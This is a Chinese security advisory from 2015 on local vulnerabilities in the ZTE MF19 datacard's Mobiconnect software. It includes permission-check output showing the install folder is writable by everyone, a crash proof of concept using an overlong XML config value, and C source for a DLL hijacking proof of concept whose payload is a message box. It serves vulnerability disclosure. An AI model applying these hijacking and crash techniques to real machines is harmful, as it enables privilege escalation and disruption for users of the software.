安全研究
安全漏洞
ZTE Datacard MF19 0V1.0.0B PCW多个安全漏洞
发布日期:2015-01-01
更新日期:2015-01-08
受影响系统:
ZTE MF19 0V1.0.0B描述:
BUGTRAQ ID: 71892
ZTE MF19是一个数据卡设备。
ZTE Datacard MF19 0V1.0.0B PCW在实现上存在任意代码执行漏洞、本地权限提升漏洞、本地拒绝服务等多个漏洞,攻击者可利用这些漏洞获取提升的权限、造成受影响设备崩溃等影响。
<*来源:hadji samir (s-dz@hotmail.fr)
链接:http://www.securityfocus.com/archive/1/534392
http://www.vulnerability-lab.com/get_content.php?id=1392
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
C:\Users\s-dz\Desktop>accesschk.exe -dqv "C:\Program Files\Mobiconnect"
C:\Program Files\Mobiconnect
Medium Mandatory Level (Default) [No-Write-Up]
RW Tout le monde
FILE_ALL_ACCESS
RW NT SERVICE\TrustedInstaller
FILE_ALL_ACCESS
RW AUTORITE NT\SystÃ?me
FILE_ALL_ACCESS
RW BUILTIN\Administrateurs
FILE_ALL_ACCESS
R BUILTIN\Utilisateurs
FILE_LIST_DIRECTORY
FILE_READ_ATTRIBUTES
FILE_READ_EA
FILE_TRAVERSE
SYNCHRONIZE
READ_CONTROL
C:\Users\s-dz\Desktop>
C:\Program Files>icacls "Mobiconnect"
Mobiconnect Tout le monde:(F)
Tout le monde:(OI)(CI)(IO)(F)
NT SERVICE\TrustedInstaller:(I)(F)
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
AUTORITE NT\Système:(I)(F)
AUTORITE NT\Système:(I)(OI)(CI)(IO)(F)
BUILTIN\Administrateurs:(I)(F)
BUILTIN\Administrateurs:(I)(OI)(CI)(IO)(F)
BUILTIN\Utilisateurs:(I)(RX)
BUILTIN\Utilisateurs:(I)(OI)(CI)(IO)(GR,GE)
CREATEUR PROPRIETAIRE:(I)(OI)(CI)(IO)(F)
1 fichiers correctement traités ; échec du traitement de 0 fichiers
--- PoC Local DoS ---
first go to C:\program files\Internet Mobile\networkCfg.xml (Network configuration)
and write "A" * 3000 in <ConfigFileName>"A" x 3000</ConfigFileName> . Save it open the program .
poc will crash ...
--- DLL Hijacking Exploit (mms_dll_r.dll, mediaplayerdll.dll) ---
*/
#include <windows.h>
BOOL WINAPI DllMain (
HANDLE hinstDLL,
DWORD fdwReason,
LPVOID lpvReserved)
{
switch (fdwReason)
{
case DLL_PROCESS_ATTACH:
owned();
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
int owned() {
MessageBox(0, "ZTE DLL Hijacked\Hadji Samir", "POC", MB_OK);
}
建议:
厂商补丁:
ZTE
---
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.zte.com.cn
http://www.mobilis.dz/entreprises/mobiconnect.php
http://www.3g.dz/fr/cle_mas/index.php?id_document=2
浏览次数:2919
严重程度:0(网友投票)
绿盟科技给您安全的保障